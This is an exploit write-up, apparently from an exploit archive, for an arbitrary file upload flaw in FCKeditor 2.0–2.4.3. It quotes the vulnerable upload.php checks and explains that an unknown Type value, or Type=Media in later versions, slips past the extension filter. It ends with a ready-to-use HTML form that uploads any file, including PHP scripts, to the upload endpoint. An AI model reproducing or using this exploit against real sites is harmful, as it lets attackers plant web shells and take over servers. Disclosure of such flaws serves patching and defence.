# Exploit Title: FCKeditor 2.0-2.4.3 arbitrary file upload# Author: grabz# Software Link: http://sourceforge.net/projects/fckeditor/# Version: FCKeditor 2.x <= 2.4.3# Tested on: 2.0, 2.2, 2.3.2, 2.4.0, 2.4.3for version 2.0-2.2:infile FCKeditor/editor/filemanager/upload/php/upload.php
#$sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;##// Get the allowed and denied extensions arrays.#$arAllowed= $Config['AllowedExtensions'][$sType] ;#$arDenied= $Config['DeniedExtensions'][$sType] ;
we can send as Type any text that not contained in(File, Flash, Image)and
then we can upload filewithany extension like ".php"for version 2.3.0-2.4.3:infile FCKeditor/editor/filemanager/upload/php/upload.php
#$sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;##// Check if it is an allowed type.#if ( !in_array( $sType, array('File','Image','Flash','Media') ) )#SendResults( 1, '', '', 'Invalid type specified' ) ;##// Get the allowed and denied extensions arrays.#$arAllowed= $Config['AllowedExtensions'][$sType] ;#$arDenied= $Config['DeniedExtensions'][$sType] ;in this code we can see filter by Type, but in config.php
$Config['AllowedExtensions']['Media']and
$Config['DeniedExtensions']['Media']not exists))if we send Type=Media, we can upload anyfile)#Exploit<form enctype="multipart/form-data" action="
http://localhost/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media"
method="post"><input name="NewFile"type="file"><inputtype="submit" value="submit"></form>
